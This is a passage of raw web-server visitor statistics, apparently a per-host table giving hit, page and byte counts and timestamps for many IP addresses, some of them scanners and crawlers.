0 28800227 28800227 0 28800227 612 206.168.34.51 5 1 1 0 0 29366951 0 0 29366951 0 0 1365 85.175.197.44 5 1 1 0 1 28673422 0 28673422 28673422 0 28673422 612 206.168.34.50 5 1 0 0 0 29301183 0 0 29301183 0 0 87 13.51.207.106 5 2 2 0 0 29273718 0 0 29273718 0 0 609 104.165.105.102 5 1 1 0 0 28700952 0 0 28700952 0 0 1261 147.185.132.118 5 3 3 0 18 29216662 0 29216662 29216662 0 29216662 3771 44.212.77.221 5 3 3 0 0 28807560 0 0 28660876 0 0 3782 135.148.100.196 5 1 1 0 2 29006098 0 29006098 29006098 0 29006098 512 206.168.34.44 5 0 0 0 4 0 0 28815140 0 0 28815140 0 159.203.110.51 5 1 1 0 1 28932850 0 28932850 28932850 0 28932850 512 206.168.34.42 5 1 1 0 0 28599927 0 0 28599927 0 0 612 104.166.80.145 5 3 1 0 1 28879070 0 28879070 28879070 0 28879070 2968 35.219.236.112 5 1 1 0 0 29208764 0 0 29208764 0 0 609 3.146.111.124 5 3 3 0 17 29382672 0 29382672 29382672 0 29382672 1869 34.73.160.232 5 1 0 0 0 29099990 0 0 29099990 0 0 2321 121.78.21.204 5 8 2 0 0 28686124 0 0 28686124 0 0 8056 205.169.39.206 5 1 1 0 2 28902621 0 28902621 28902621 0 28902621 509 164.92.164.206 5 7 1 0 0 28703414 0 0 28703413 0 0 8661 194.55.186.252 5 1 1 0 0 29352526 0 0 29352526 0 0 682 103.147.122.46 5 7 2 0 0 28861870 0 0 28861870 0 0 7450 205.169.39.192 5 8 2 0 0 28773964 0 0 28773964 0 0 8056 205.169.39.191 5 1 1 0 0 29120842 0 0 29120842 0 0 512 107.174.224.18 5 1 1 0 0 29021475 0 0 29021475 0 0 512 47.79.2.223 5 4 4 0 0 29363349 0 0 29314499 0 0 2728 3.222.165.167 5 1 1 0 1 29392375 0 29392375 29392375 0 29392375 314 138.197.147.225 5 1 1 0 0 28978554 0 0 28978554 0 0 1037 54.76.216.236 5 0 0 0 5 0 0 29351087 0 0 29351087 0 86.110.15.111 5 1 1 0 0 28598433 0 0 28598433 0 0 608 104.166.80.124 5 1 0 0 0 29125506 0 0 29125506 0 0 87 34.222.217.87 5 1 1 0 0 29245043 0 0 29245043 0 0 609 104.248.225.17 5 2 1 0 0 29099990 0 0 29099990 0 0 1793 121.78.21.175 5 3 3 0 18 29303352 0 29303352 29303352 0 29303352 4095 54.91.204.107 5 1 0 0 0 29125506 0 0 29125506 0 0 87 16.171.65.75 5 1 1 0 1 29306526 0 29306526 29306526 0 29306526 682 157.245.7.77 5 3 3 0 15 28861803 0 28861803 28861803 0 28861803 2586 159.65.18.197 5 1 1 0 1 29366038 0 29366038 29366038 0 29366038 682 178.128.46.228 5 8 2 0 0 28600010 0 0 28600010 0 0 8056 205.169.39.166 5 0 0 0 144 0 0 29358831 0 0 29358831 0 130.33.73.54 5 1 1 0 1 28954594 0 28954594 28954594 0 28954594 512 137.184.211.72 5 1 1 0 1 28866789 0 28866789 28866789 0 28866789 512 199.45.155.95 5 1 1 0 0 29286014 0 0 29286014 0 0 609 34.140.74.237 5 1 1 0 1 28918787 0 28918787 28918787 0 28918787 512 199.45.155.91 5 1 1 0 1 29141810 0 29141810 29141810 0 29141810 512 143.244.151.254 5 1 1 0 1 28669512 0 28669512 28669512 0 28669512 612 199.45.155.83 5 2 2 0 1 29174450 0 29174449 29174449 0 29174449 1218 199.45.155.81 5 2 2 0 2 28774691 0 28774691 28774691 0 28774691 1224 157.230.31.168 5 1 1 0 0 28601201 0 0 28601201 0 0 612 36.99.136.140 5 1 0 0 0 28686123 0 0 28686123 0 0 87 23.178.112.216 5 1 0 0 0 28861803 0 0 28861803 0 0 87 23.178.112.215 5 3 3 0 1 29361013 0 29361012 29361012 0 29361012 2046 199.45.155.71 5 0 0 0 1 0 0 29354735 0 0 29354735 0 159.146.18.84 5 1 1 0 1 29299065 0 29299065 29299065 0 29299065 682 146.190.25.83 5 1 1 0 1 28855085 0 28855085 28855085 0 28855085 512 68.183.198.173 5 2 2 0 1 29211408 0 29211408 29211408 0 29211408 1218 199.45.155.70 5 1 0 0 0 29125506 0 0 29125506 0 0 87 23.178.112.211 5 2 0 0 0 29389153 0 0 29301183 0 0 193 23.178.112.210 5 0 0 0 1 0 0 29358152 0 0 29358152 0 5.180.243.22 5 2 2 0 2 28761442 0 28761442 28761442 0 28761442 1216 64.227.178.158 5 1 0 0 0 28598314 0 0 28598314 0 0 87 23.178.112.207 5 0 0 0 1 0 0 29250567 0 0 29250567 0 31.220.40.210 5 0 0 0 2 0 0 29348987 0 0 29348987 0 31.128.179.15 5 1 1 0 0 29309423 0 0 29309423 0 0 682 34.87.62.186 5 0 0 0 1 0 0 29054448 0 0 29054448 0 147.185.132.93 5 0 0 0 2 0 0 29126896 0 0 29126896 0 192.3.51.163 5 0 0 0 1 0 0 28781947 0 0 28781947 0 147.185.132.85 5 2 2 0 0 28785181 0 0 28742460 0 0 2515 205.210.31.6 5 2 2 0 0 28655282 0 0 28655282 0 0 1224 104.131.171.234 5 1 1 0 0 29281043 0 0 29281043 0 0 1257 63.34.162.163 5 1 1 0 0 28701414 0 0 28701414 0 0 1258 147.185.132.81 5 1 1 0 1 28686154 0 28686154 28686154 0 28686154 612 178.249.209.185 5 1 1 0 0 29352188 0 0 29352188 0 0 682 103.110.84.40 5 1 0 0 0 28861803 0 0 28861803 0 0 87 13.49.80.104 5 4 1 0 2 29358978 0 29358978 29358978 0 29358978 4311 34.1.31.117 5 7 2 0 0 29129386 0 0 29129386 0 0 7450 205.169.39.109 5 1 1 0 0 29355730 0 0 29355730 0 0 1365 147.185.132.72 5 0 0 0 91 0 0 29388027 0 0 29388027 0 52.169.5.4 5 1 1 0 0 29214635 0 0 29214635 0 0 609 47.79.226.189 5 1 1 0 1 29205421 0 29205421 29205421 0 29205421 609 178.62.50.181 5 0 0 0 1 0 0 29043921 0 0 29043921 0 147.185.132.70 5 1 1 0 2 29003761 0 29003761 29003761 0 29003761 509 138.197.27.122 5 1 1 0 1 29345937 0 29345937 29345937 0 29345937 682 174.138.4.105 5 3 1 0 0 29326536 0 0 29326536 0 0 3365 163.5.212.39 5 1 0 0 0 29389153 0 0 29389153 0 0 106 35.88.153.149 5 1 1 0 1 28800236 0 28800236 28800236 0 28800236 612 167.94.145.99 5 0 0 0 1 0 0 28861835 0 0 28861835 0 151.115.77.26 5 1 1 0 0 29306523 0 0 29306523 0 0 682 34.142.158.16 5 1 1 0 1 29029541 0 29029541 29029541 0 29029541 512 159.203.89.95 5 1 1 0 1 28791194 0 28791194 28791194 0 28791194 612 199.45.154.146 5 1 1 0 0 29320961 0 0 29320961 0 0 682 165.154.254.143 5 1 1 0 0 28731116 0 0 28731116 0 0 1262 34.227.14.99 5 1 1 0 1 29389481 0 29389481 29389481 0 29389481 314 138.197.136.208 5 1 1 0 0 28743000 0 0 28743000 0 0 1258 147.185.132.52 5 1 0 0 0 28686123 0 0 28686123 0 0 87 3.129.20.150 5 3 1 0 1 29176024 0 29176024 29176024 0 29176024 2255 27.115.124.70 5 0 0 0 1 0 0 29176024 0 0 29176024 0 27.115.124.69 5 0 0 0 1 0 0 28923521 0 0 28923521 0 147.185.132.51 5 0 0 0 2 0 0 29046676 0 0 29046676 0 18.170.33.114 5 4 1 0 2 29355149 0 29355149 29355149 0 29355149 4311 34.1.25.126 5 4 4 0 10 28706699 0 28706699 28706697 0 28706697 3747 118.193.59.227 5 0 0 0 1 0 0 28987232 0 0 28987232 0 80.94.95.157 5 0 0 0 155 0 0 29384960 0 0 29384959 0 20.222.232.51 5 2 2 0 0 29415662 0 0 29371365 0 0 996 3.140.182.19 5 0 0 0 2 0 0 29269510 0 0 29269510 0 35.247.154.132 5 19 1 0 0 29381340 0 0 28598314 0 0 1466 194.87.217.15 5 1 1 0 2 29056810 0 29056810 29056810 0 29056810 512 199.45.154.128 5 1 1 0 1 29138933 0 29138933 29138933 0 29138933 512 138.68.191.30 5 2 2 1 2 29403002 29403002 29403002 29403002 29403002 29403002 628 199.45.154.126 5 2 1 0 0 29176024 0 0 29176024 0 0 1896 27.115.124.53 5 0 0 0 6 0 0 29228723 0 0 29228316 0 45.141.215.193 5 1 1 0 0 29301977 0 0 29301977 0 0 682 35.227.188.140 5 2 0 0 1 29176024 0 29176024 29176024 0 29176024 2683 27.115.124.45 5 1 1 0 1 28673322 0 28673322 28673322 0 28673322 612 199.45.154.117 5 1 1 0 0 29023558 0 0 29023558 0 0 512 47.79.121.170 5 0 0 0 1 0 0 29250910 0 0 29250910 0 4.227.36.76 5 32 21 2 28 29250913 29250911 29250913 29250910 29250910 29250910 306949 20.171.207.116 5 3 0 0 0 29176024 0 0 29176024 0 0 3089 27.115.124.38 5 30 21 1 22 29250912 29250910 29250912 29250910 29250910 29250910 44527 20.171.207.114 5 0 0 0 1 0 0 29368850 0 0 29368850 0 91.214.185.127 5 2 2 0 0 29389518 0 0 29384542 0 0 628 44.193.254.10 5 1 1 0 0 29257471 0 0 29257471 0 0 609 44.195.81.24 5 1 1 0 2 28983049 0 28983049 28983049 0 28983049 509 167.172.31.197 5 0 0 0 1 0 0 28962546 0 0 28962546 0 45.148.10.86 5 1 0 0 0 28949645 0 0 28949645 0 0 87 23.178.112.109 5 1 0 0 0 29213346 0 0 29213346 0 0 87 23.178.112.107 5 1 0 0 0 29213346 0 0 29213346 0 0 87 18.191.196.4 5 1 0 0 0 28773963 0 0 28773963 0 0 87 23.178.112.106 5 2 2 0 0 28686205 0 0 28598316 0 0 1224 95.217.18.177 5 3 0 0 0 29362906 0 0 29251795 0 0 5004 45.148.10.80 5 1 1 0 0 29237264 0 0 29237264 0 0 609 185.247.137.249 5 1 1 0 1 29278645 0 29278645 29278645 0 29278645 609 139.59.4.15 5 1 0 0 0 29037485 0 0 29037485 0 0 87 23.178.112.101 5 0 0 0 17 0 0 29282380 0 0 29282380 0 52.169.25.28 5 0 0 0 1 0 0 29250910 0 0 29250910 0 4.227.36.53 5 1 1 0 0 29135431 0 0 29135431 0 0 1037 192.175.111.254 5 0 0 0 1 0 0 29176024 0 0 29176024 0 27.115.124.6 5 0 0 0 1 0 0 29135431 0 0 29135431 0 192.175.111.251 5 2 1 0 1 28951164 0 28951164 28951164 0 28951164 8743 106.75.181.50 5 1 1 0 0 28598351 0 0 28598351 0 0 1261 192.175.111.247 5 1 0 0 0 29041404 0 0 29041404 0 0 2321 43.131.31.89 5 5 1 0 0 29176024 0 0 29176024 0 0 5026 27.115.124.101 5 1 1 0 0 28598351 0 0 28598351 0 0 1261 192.175.111.244 5 0 0 0 1 0 0 29117824 0 0 29117824 0 35.180.209.82 5 13 3 0 1 28760125 0 28720488 28632603 0 28720488 15251 45.148.10.59 5 1 1 0 0 29369500 0 0 29369500 0 0 1365 196.251.85.87 5 3 1 0 0 29302432 0 0 29302432 0 0 9753 167.99.77.32 5 1 1 0 0 29135431 0 0 29135431 0 0 1037 192.175.111.238 5 0 0 0 1 0 0 28886193 0 0 28886193 0 3.235.52.66 5 2 2 0 0 28661077 0 0 28661077 0 0 1224 138.197.89.19 5 0 0 0 1 0 0 29361766 0 0 29361766 0 5.3.69.216 5 3 3 0 19 29270138 0 29270138 29270138 0 29249604 3771 194.26.192.203 5 0 0 0 1 0 0 28814678 0 0 28814678 0 35.207.228.82 5 1 1 0 1 29061160 0 29061160 29061160 0 29061160 512 138.197.76.129 5 0 0 0 1 0 0 28854929 0 0 28854929 0 87.247.158.120 5 0 0 0 1 0 0 29360066 0 0 29360066 0 4.227.36.23 5 1 1 0 1 29319126 0 29319126 29319126 0 29319126 682 161.35.171.138 5 4 1 0 2 29354717 0 29354717 29354717 0 29354717 4311 34.1.23.87 5 0 0 0 1 0 0 29361308 0 0 29361308 0 93.175.200.168 5 0 0 0 140 0 0 29354065 0 0 29354064 0 74.226.158.222 5 2 2 0 0 28653872 0 0 28653872 0 0 1224 165.232.113.35 5 1 1 0 0 28954523 0 0 28954523 0 0 512 185.247.137.208 5 1 1 0 1 29064133 0 29064133 29064133 0 29064133 512 139.59.170.102 5 1 1 0 0 28620862 0 0 28620862 0 0 1257 198.235.24.254 5 1 1 0 0 28686217 0 0 28686217 0 0 612 45.196.45.137 5 1 1 0 2 28696691 0 29144652 28696691 0 28919497 1262 198.235.24.253 5 0 0 0 92 0 0 29327096 0 0 29327095 0 172.190.142.176 5 0 0 0 1 0 0 29215699 0 0 29215699 0 94.141.161.60 5 1 1 0 0 29182271 0 0 29182271 0 0 609 95.182.100.70 5 2 2 0 0 29220501 0 0 28637159 0 0 2515 198.235.24.248 5 1 1 0 0 29038499 0 0 29038499 0 0 1037 188.165.87.111 5 0 0 0 1 0 0 28686217 0 0 28686217 0 43.159.48.40 5 3 3 0 15 28773964 0 28773964 28773964 0 28773964 3136 157.245.105.107 5 0 0 0 1 0 0 28962705 0 0 28962705 0 198.235.24.246 5 1 1 0 0 28954917 0 0 28954917 0 0 512 217.15.164.190 5 1 1 0 0 28658880 0 0 28658880 0 0 1258 198.235.24.245 5 3 3 0 18 29048103 0 29048103 29048103 0 29048103 3099 85.204.70.92 5 0 0 0 1 0 0 29146878 0 0 29146878 0 45.32.52.232 5 1 1 0 0 28666010 0 0 28666010 0 0 1262 198.235.24.243 5 1 1 0 0 28951997 0 0 28951997 0 0 1037 188.165.87.106 5 0 0 0 3 0 0 29359944 0 0 29359944 0 78.40.220.119 5 1 1 0 0 28950811 0 0 28950811 0 0 1037 188.165.87.104 5 2 2 0 0 29037521 0 0 29001935 0 0 1024 207.241.225.134 5 0 0 0 1 0 0 29190744 0 0 29190744 0 198.235.24.240 5 0 0 0 104 0 0 29365498 0 0 29365498 0 4.230.32.252 5 0 0 0 2 0 0 29107921 0 0 29107921 0 13.37.250.197 5 1 1 0 0 28652258 0 0 28652258 0 0 1257 198.235.24.235 5 2 2 0 0 28743027 0 0 28641676 0 0 2519 198.235.24.233 5 1 1 0 1 28896996 0 28896996 28896996 0 28896996 512 142.93.211.253 5 1 1 0 0 29341643 0 0 29341643 0 0 1365 198.235.24.231 5 0 0 0 43 0 0 29211762 0 0 29211741 0 156.59.62.150 5 3 1 0 0 28781555 0 0 28781555 0 0 3291 3.235.141.3 5 2 2 0 0 28686304 0 0 28598495 0 0 1224 133.242.174.119 5 5 1 0 1 28598526 0 28598526 28598526 0 28598526 4570 80.255.10.205 5 1 1 0 0 28636855 0 0 28636855 0 0 1257 198.235.24.224 5 0 0 0 1 0 0 29094291 0 0 29094291 0 198.235.24.223 5 2 2 0 0 29362874 0 0 29362874 0 0 2730 206.119.173.163 5 2 2 0 0 28780700 0 0 28780700 0 0 1224 207.241.225.114 5 0 0 0 1 0 0 29091034 0 0 29091034 0 198.235.24.218 5 0 0 0 1 0 0 29043546 0 0 29043546 0 198.235.24.217 5 1 1 0 2 28996620 0 28996620 28996620 0 28996620 512 138.197.168.97 5 1 1 0 0 29366949 0 0 29366949 0 0 1365 5.16.136.240 5 1 1 0 0 29236344 0 0 29236344 0 0 1257 198.235.24.216 5 1 1 0 1 29303087 0 29303087 29303087 0 29303087 682 161.35.129.167 5 1 0 0 0 28773963 0 0 28773963 0 0 87 13.60.105.179 5 0 0 0 3 0 0 29369153 0 0 29369153 0 46.63.132.248 5 0 0 0 1 0 0 29180843 0 0 29180843 0 103.129.214.43 5 1 1 0 2 29084498 0 29084498 29084498 0 29084498 509 178.62.27.190 5 1 1 0 0 29039207 0 0 29039207 0 0 1033 134.199.164.140 5 1 1 0 0 28611787 0 0 28611787 0 0 1257 198.235.24.205 5 0 0 0 189 0 0 29386475 0 0 29386475 0 20.48.160.218 5 1 1 0 1 28875289 0 28875289 28875289 0 28875289 512 167.71.232.74 5 1 1 0 1 28673027 0 28673027 28673027 0 28673027 612 162.142.125.214 5 2 2 0 1 29333585 0 29333584 29333584 0 29333584 1364 162.142.125.213 5 0 0 0 1 0 0 28958685 0 0 28958685 0 198.235.24.202 5 2 2 0 2 28794936 0 28794936 28794936 0 28794936 1224 147.182.178.238 5 3 3 0 18 29303800 0 29303800 29303800 0 29303800 4095 34.173.168.118 5 1 1 0 0 29291653 0 0 29291653 0 0 609 185.247.137.139 5 3 3 0 2 29150193 0 29150193 28717572 0 28717572 1636 162.142.125.210 5 1 1 0 1 28844528 0 28844528 28844528 0 28844528 512 162.142.125.198 5 2 2 0 0 29267363 0 0 28661173 0 0 2519 198.235.24.185 5 1 1 0 0 29075606 0 0 29075606 0 0 1037 198.235.24.184 5 11 1 0 0 28784074 0 0 28784070 0 0 14027 3.239.59.69 5 1 1 0 5 29274239 0 29274239 29274239 0 29274239 1257 128.199.9.78 5 1 1 0 0 29235940 0 0 29235940 0 0 1257 198.235.24.182 5 0 0 1 1 0 29180151 29180151 0 29180151 29180151 0 47.82.60.98 5 1 1 0 0 28620625 0 0 28620625 0 0 1261 198.235.24.181 5 0 0 0 1 0 0 29355100 0 0 29355100 0 208.84.101.102 5 1 1 0 0 29124603 0 0 29124603 0 0 512 185.247.137.131 5 1 1 0 0 28964913 0 0 28964913 0 0 1037 198.235.24.180 5 1 1 0 0 29361402 0 0 29361402 0 0 1365 198.235.24.179 5 0 0 0 3 0 0 29369155 0 0 29369155 0 213.79.119.79 5 1 1 0 0 29339009 0 0 29339009 0 0 1365 198.235.24.176 5 3 3 0 0 29172959 0 0 29172959 0 0 1827 47.82.60.92 5 1 0 0 0 28686123 0 0 28686123 0 0 87 13.229.108.101 5 1 1 0 0 29186456 0 0 29186456 0 0 1257 198.235.24.171 5 2 1 0 1 28861818 0 28861818 28861818 0 28861818 8739 106.75.173.165 5 1 1 0 0 28613111 0 0 28613111 0 0 1257 198.235.24.168 5 1 1 0 1 28960354 0 28960354 28960354 0 28960354 512 157.230.120.147 5 1 1 0 1 29359628 0 29359628 29359628 0 29359628 682 165.22.228.237 5 0 0 0 1 0 0 28817230 0 0 28817230 0 34.135.211.21 5 1 1 0 0 28925054 0 0 28925054 0 0 1037 198.235.24.165 5 1 1 0 0 28625717 0 0 28625717 0 0 1261 198.235.24.159 5 1 1 0 0 28901130 0 0 28901130 0 0 512 185.247.137.107 5 0 0 0 2 0 0 28696768 0 0 28696768 0 167.71.219.2 5 0 0 0 1 0 0 29001245 0 0 29001245 0 57.180.240.215 5 1 1 0 0 29244836 0 0 29244836 0 0 1257 54.73.91.94 5 8 8 0 0 29405803 0 0 29034190 0 0 4456 145.220.91.19 5 3 3 0 17 28949647 0 28949647 28949646 0 28949646 2586 138.68.82.23 5 1 1 0 0 29299099 0 0 29299099 0 0 1365 198.235.24.149 5 1 1 0 0 29277766 0 0 29277766 0 0 1257 198.235.24.148 5 0 0 0 2 0 0 28950080 0 0 28950079 0 103.252.89.34 5 0 0 0 1 0 0 28774705 0 0 28774705 0 47.88.86.63 5 1 1 0 0 29146226 0 0 29146226 0 0 1033 198.235.24.143 5 0 0 0 4 0 0 29180810 0 0 29180752 0 167.179.87.227 5 0 0 0 113 0 0 29329147 0 0 29329146 0 172.192.74.60 5 2 2 0 0 28746191 0 0 28702841 0 0 2519 198.235.24.138 5 3 1 0 0 28966560 0 0 28966560 0 0 3195 35.95.112.155 5 2 2 0 2 28790435 0 28790435 28790435 0 28790435 1224 207.154.207.90 5 1 1 0 0 28620244 0 0 28620244 0 0 1262 198.235.24.137 5 1 1 0 0 28616089 0 0 28616089 0 0 1261 198.235.24.134 5 1 1 0 2 29077471 0 29077471 29077471 0 29077471 512 157.230.220.129 5 0 0 0 1 0 0 29358155 0 0 29358155 0 95.24.35.204 5 0 0 0 1 0 0 29357731 0 0 29357731 0 93.124.47.74 5 4 4 0 0 29350665 0 0 28614967 0 0 5145 198.235.24.133 5 3 3 0 0 29170970 0 0 29170970 0 0 1827 47.82.60.6 5 1 1 0 0 29304734 0 0 29304734 0 0 682 165.227.214.30 5 0 0 0 2 0 0 28862270 0 0 28862270 0 167.172.73.68 5 1 1 0 0 28618290 0 0 28618290 0 0 1257 198.235.24.132 5 1 1 0 0 28738083 0 0 28738083 0 0 1257 198.235.24.131 5 2 2 0 0 28693938 0 0 28693938 0 0 1224 165.232.110.73 5 2 2 0 0 29211399 0 0 29211398 0 0 1866 101.198.0.189 5 0 0 0 2 0 0 29079762 0 0 29079762 0 159.65.8.65 5 1 1 0 11 28995765 0 28995766 28995765 0 28995765 512 35.181.58.59 5 3 3 0 0 29371099 0 0 29367415 0 0 2046 18.207.110.98 5 0 0 0 1 0 0 28879820 0 0 28879820 0 198.235.24.127 5 0 0 0 3 0 0 29211399 0 0 29211399 0 101.198.0.187 5 1 1 0 0 28737451 0 0 28737451 0 0 1261 198.235.24.126 5 2 1 0 1 28861809 0 28861809 28861809 0 28861809 8743 106.75.132.208 5 1 1 0 0 28702017 0 0 28702017 0 0 1257 198.235.24.122 5 0 0 0 1 0 0 29382618 0 0 29382618 0 45.154.98.45 5 2 2 0 2 28793344 0 28793344 28793344 0 28793344 1224 159.65.162.28 5 0 0 0 2 0 0 28612865 0 0 28612865 0 36.70.227.136 5 1 1 0 2 29211399 0 29211399 29211399 0 29211399 609 101.198.0.180 5 1 1 0 1 29285613 0 29285613 29285613 0 29285613 609 34.143.190.22 5 1 1 0 0 28696382 0 0 28696382 0 0 1258 198.235.24.118 5 1 1 0 1 29239575 0 29239575 29239575 0 29239575 609 146.190.45.24 5 0 0 0 1 0 0 28788981 0 0 28788981 0 198.235.24.2 5 1 1 0 50 29313789 0 29313965 29313789 0 29313801 0 119.59.96.90 5 1 0 0 0 28949645 0 0 28949645 0 0 87 54.251.183.201 5 1 1 0 0 29184974 0 0 29184974 0 0 609 47.82.60.32 5 1 1 0 0 28978747 0 0 28978747 0 0 1037 34.240.72.35 5 4 1 0 0 29301185 0 0 29129385 0 0 4523 34.122.147.229 5 1 1 0 0 29226673 0 0 29226673 0 0 1257 198.235.24.111 5 1 1 0 0 29204620 0 0 29204620 0 0 609 47.82.60.27 5 0 0 0 1 0 0 29049244 0 0 29049244 0 198.235.24.108 5 0 0 0 1 0 0 29352522 0 0 29352522 0 172.182.204.53 5 0 0 0 2 0 0 29235620 0 0 29235620 0 194.233.79.48 5 0 0 0 2 0 0 29002300 0 0 29002300 0 51.44.172.234 5 3 3 0 15 28686123 0 28686123 28686123 0 28686123 3134 159.89.17.243 5 1 1 0 1 28795587 0 28795587 28795587 0 28795587 612 167.94.145.111 5 1 1 0 1 29217728 0 29217728 29217728 0 29217728 609 138.68.159.168 5 2 2 0 1 29273800 0 29273800 29273800 0 29273800 1218 162.142.125.116 5 1 1 0 0 29154341 0 0 29154341 0 0 512 170.39.218.62 5 1 1 0 1 28717636 0 28717636 28717636 0 28717636 612 167.94.145.109 5 0 0 0 1 0 0 29139900 0 0 29139900 0 198.235.24.104 5 1 1 0 2 29011986 0 29011987 29011986 0 29011986 512 167.94.145.108 5 0 0 0 1 0 0 29139853 0 0 29139853 0 198.235.24.103 5 0 0 0 1 0 0 29224424 0 0 29224424 0 198.55.98.216 5 2 2 0 0 28696980 0 0 28696980 0 0 1224 54.147.8.215 5 2 2 0 0 29124008 0 0 29119747 0 0 1024 170.39.218.59 5 1 1 0 0 28651727 0 0 28651727 0 0 1258 198.235.24.102 5 3 1 0 0 29144676 0 0 29135541 0 0 2971 170.39.218.58 5 0 0 0 117 0 0 29294468 0 0 29294468 0 13.74.252.22 5 1 1 0 2 29145223 0 29145223 29145223 0 29145223 509 64.225.31.127 5 1 1 0 1 29263273 0 29263273 29263273 0 29263273 0 196.251.86.207 5 1 1 0 1 28791263 0 28791263 28791263 0 28791263 612 167.94.145.100 5 1 1 0 0 29194697 0 0 29194697 0 0 609 47.82.60.12 5 1 1 0 1 28862462 0 28862462 28862462 0 28862462 512 146.190.115.73 5 0 0 0 2 0 0 29258712 0 0 29258712 0 34.143.241.214 5 1 1 0 2 29015490 0 29033651 29015490 0 29020685 509 194.50.16.252 5 0 0 0 5 0 0 28974060 0 0 28974060 0 87.251.78.131 5 0 0 0 1 0 0 29211399 0 0 29211399 0 101.198.0.150 5 1 1 0 2 28976763 0 28976763 28976763 0 28976763 512 64.227.151.94 5 3 3 0 17 29320577 0 29320577 29320577 0 29320577 4095 34.61.175.137 5 0 0 0 1 0 0 28922336 0 0 28922336 0 198.235.24.93 5 1 1 0 0 28659015 0 0 28659015 0 0 1257 198.235.24.91 5 1 1 0 2 28963567 0 28963567 28963567 0 28963567 509 139.59.29.229 5 4 2 0 3 28782644 0 28782644 28782644 0 28782644 3675 35.213.200.91 5 1 1 0 0 29014554 0 0 29014554 0 0 1037 34.247.213.238 5 1 1 0 0 29236715 0 0 29236715 0 0 609 3.87.8.212 5 1 1 0 0 29240335 0 0 29240335 0 0 609 34.168.119.198 5 1 1 0 1 28888365 0 28888365 28888365 0 28888365 512 198.199.67.170 5 4 1 0 0 29129385 0 0 29129385 0 0 4479 205.169.39.52 5 5 1 0 0 29301189 0 0 29301189 0 0 5055 205.169.39.50 5 1 1 0 0 29214404 0 0 29214404 0 0 609 34.48.188.191 5 1 1 0 0 29022139 0 0 29022139 0 0 512 47.82.10.27 5 0 0 0 242 0 0 29362131 0 0 29359668 0 74.176.186.150 5 0 0 0 1 0 0 29095735 0 0 29095735 0 198.235.24.75 5 1 0 0 0 28686123 0 0 28686123 0 0 87 51.20.125.182 5 1 1 0 0 29303543 0 0 29303543 0 0 682 34.186.7.129 5 1 1 0 0 28686124 0 0 28686124 0 0 612 205.169.39.42 5 1 1 0 1 29213834 0 29213834 29213834 0 29213834 609 104.248.116.58 5 1 1 0 2 29157909 0 29157909 29157909 0 29157909 512 209.97.178.22 5 0 0 0 1 0 0 28686848 0 0 28686848 0 47.254.74.59 5 4 4 0 10 28726838 0 28726838 28726835 0 28726835 3747 152.32.217.164 5 2 2 0 0 28686799 0 0 28686799 0 0 1224 137.184.160.99 5 2 1 0 1 28949649 0 28949649 28949649 0 28949649 8743 106.75.132.125 5 0 0 0 1 0 0 29223857 0 0 29223857 0 45.80.158.145 5 1 1 0 0 29039137 0 0 29039137 0 0 512 47.79.117.165 5 1 1 0 1 29395262 0 29395262 29395262 0 29395262 314 161.35.148.64 5 0 0 0 1 0 0 28782312 0 0 28782312 0 198.235.24.58 5 1 1 0 0 29028196 0 0 29028196 0 0 512 44.204.102.51 5 1 1 0 0 29055314 0 0 29055314 0 0 1033 198.235.24.57 5 5 1 0 0 28629134 0 0 28629134 0 0 4985 65.154.226.168 5 5 1 0 0 28598316 0 0 28598316 0 0 4985 65.154.226.167 5 1 1 0 0 28598321 0 0 28598321 0 0 612 65.154.226.166 5 1 0 0 0 29301193 0 0 29301193 0 0 406 205.169.39.26 5 1 1 0 0 28666651 0 0 28666651 0 0 1261 198.235.24.54 5 3 3 0 18 29313360 0 29313360 29313360 0 29313360 4095 54.224.229.228 5 4 1 0 0 28892043 0 0 28892043 0 0 4479 205.169.39.25 5 1 1 0 2 29063801 0 29063801 29063801 0 29063801 509 159.89.174.33 5 5 1 0 0 28773965 0 0 28773965 0 0 4985 205.169.39.23 5 2 2 0 0 28600376 0 0 28600376 0 0 1224 104.248.124.123 5 2 2 0 0 29097740 0 0 28743836 0 0 2298 198.235.24.51 5 0 0 0 1 0 0 29362288 0 0 29362288 0 88.230.176.229 5 2 2 0 63 29289142 0 29289142 29289142 0 29289142 1218 13.127.239.119 5 2 2 0 0 28704515 0 0 28662548 0 0 2524 198.235.24.50 5 5 1 0 0 28716361 0 0 28716361 0 0 4985 205.169.39.21 5 1 1 0 0 28802133 0 0 28802133 0 0 1262 104.152.52.72 5 1 1 0 0 29159717 0 0 29159717 0 0 512 15.204.43.172 5 1 1 0 0 29318309 0 0 29318309 0 0 1365 198.235.24.46 5 1 1 0 0 28776238 0 0 28776238 0 0 1262 104.152.52.71 5 1 1 0 0 29301726 0 0 29301726 0 0 682 34.10.14.60 5 5 1 0 0 28686124 0 0 28686124 0 0 4985 205.169.39.17 5 3 1 0 0 29296471 0 0 29272286 0 0 3068 23.180.120.243 5 1 0 0 0 29301283 0 0 29301283 0 0 362 205.169.39.15 5 1 1 0 0 28651839 0 0 28651839 0 0 1262 198.235.24.43 5 1 1 0 0 28776238 0 0 28776238 0 0 1261 104.152.52.67 5 5 1 0 0 28804212 0 0 28804212 0 0 4985 205.169.39.14 5 2 2 0 0 29363470 0 0 29046654 0 0 2398 198.235.24.42 5 1 1 0 0 28655489 0 0 28655489 0 0 1258 198.235.24.41 5 3 3 0 15 28686123 0 28686123 28686123 0 28686123 3136 142.93.0.66 5 1 1 0 1 29352414 0 29049210 29352414 0 29049210 1365 198.235.24.39 5 1 0 0 0 28861892 0 0 28861892 0 0 2321 205.169.39.12 5 2 2 0 0 28804019 0 0 28786781 0 0 2523 104.152.52.62 5 4 4 0 10 28691361 0 28691361 28691360 0 28691360 3747 165.154.134.203 5 1 1 0 11 28620679 0 28620679 28620679 0 28620679 612 212.227.241.137 5 1 0 0 0 28598314 0 0 28598314 0 0 87 52.37.120.138 5 1 1 0 0 28787514 0 0 28787514 0 0 1261 104.152.52.56 5 1 1 0 0 28657167 0 0 28657167 0 0 1262 198.235.24.32 5 0 0 0 1 0 0 28930229 0 0 28930229 0 198.235.24.31 5 9 1 0 0 29301185 0 0 28686124 0 0 8292 104.197.69.115 5 1 0 0 0 29125506 0 0 29125506 0 0 87 18.191.182.148 5 5 0 0 0 29314262 0 0 29314257 0 0 7687 81.17.20.98 5 1 1 0 0 29320938 0 0 29320938 0 0 1365 196.251.86.122 5 1 1 0 0 29077364 0 0 29077364 0 0 1033 198.235.24.27 5 0 0 0 2 0 0 28950808 0 0 28950808 0 128.199.153.155 5 1 1 0 2 29104517 0 29104517 29104517 0 29104517 509 165.22.196.253 5 0 0 0 2 0 0 29355640 0 0 29355640 0 46.39.228.71 5 2 2 0 0 29236947 0 